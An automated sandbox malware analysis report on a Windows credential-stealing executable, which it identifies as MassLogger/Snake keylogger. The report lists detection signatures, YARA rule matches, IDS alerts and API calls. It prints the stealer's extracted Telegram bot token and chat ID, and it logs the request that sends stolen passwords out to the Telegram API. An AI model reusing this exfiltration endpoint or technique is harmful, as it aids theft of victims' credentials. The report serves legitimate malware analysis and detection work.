Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nfKqna8HuC.exe

Overview

General Information

Sample name:nfKqna8HuC.exe
renamed because original name is a hash value
Original sample name:d410880574c2296f6f028d4112101a3ed0184b016f4d52cbcc743fc81f21da2d.exe
Analysis ID:1589102
MD5:377f17e222f90e7dbb2d75c7ba9175f3
SHA1:3aafb77c8fca8727985a1c1f3e06b54ef5f10f70
SHA256:d410880574c2296f6f028d4112101a3ed0184b016f4d52cbcc743fc81f21da2d
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • nfKqna8HuC.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\nfKqna8HuC.exe" MD5: 377F17E222F90E7DBB2D75C7BA9175F3)
    • RegSvcs.exe (PID: 5596 cmdline: "C:\Users\user\Desktop\nfKqna8HuC.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": "https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk", "Telegram Chatid": "1437092720"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 27 entries
          SourceRuleDescriptionAuthorStrings
          2.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          2.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          2.2.RegSvcs.exe.408e790.8.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            2.2.RegSvcs.exe.408e790.8.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.RegSvcs.exe.408e790.8.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                Click to see the 94 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T09:37:11.456927+010020577441Malware Command and Control Activity Detected192.168.2.549705149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T09:37:03.872616+010028032742Potentially Bad Traffic192.168.2.549704158.101.44.24280TCP
                2025-01-11T09:37:10.342161+010028032742Potentially Bad Traffic192.168.2.549704158.101.44.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T09:37:11.035720+010018100081Potentially Bad Traffic192.168.2.549705149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk", "Telegram Chatid": "1437092720"}
                Source: RegSvcs.exe.5596.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendMessage"}
                Source: nfKqna8HuC.exeVirustotal: Detection: 56%Perma Link
                Source: nfKqna8HuC.exeReversingLabs: Detection: 83%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: nfKqna8HuC.exeJoe Sandbox ML: detected
                Source: nfKqna8HuC.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: nfKqna8HuC.exe, 00000000.00000003.2055618022.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003B70000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: nfKqna8HuC.exe, 00000000.00000003.2055618022.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003B70000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00666CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00666CA9
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_006660DD
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_006663F9
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066EB60
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066F56F FindFirstFileW,FindClose,0_2_0066F56F
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0066F5FA
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00671B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00671B2F
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00671C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00671C8A
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00671F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00671F94
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_02A3E190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 03029021h2_2_03028D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 03029775h2_2_03029348
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 03029775h2_2_030296A3

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49705 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49705 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: POST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f13a4ccec0Host: api.telegram.orgContent-Length: 1077Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 158.101.44.242:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00674EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00674EB5
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f13a4ccec0Host: api.telegram.orgContent-Length: 1077Connection: Keep-Alive
                Source: RegSvcs.exe, 00000002.00000002.3303484774.000000000326A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.0000000003140000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000030C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000030C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437
                Source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00676B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00676B0C
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00676D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00676D07
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00676B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00676B0C
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00662B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00662B37
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0068F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0068F7FF

                System Summary

                barindex
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.nfKqna8HuC.exe.1ff0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.3301740960.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: This is a third-party compiled AutoIt script.0_2_00623D19
                Source: nfKqna8HuC.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: nfKqna8HuC.exe, 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fdb78bed-4
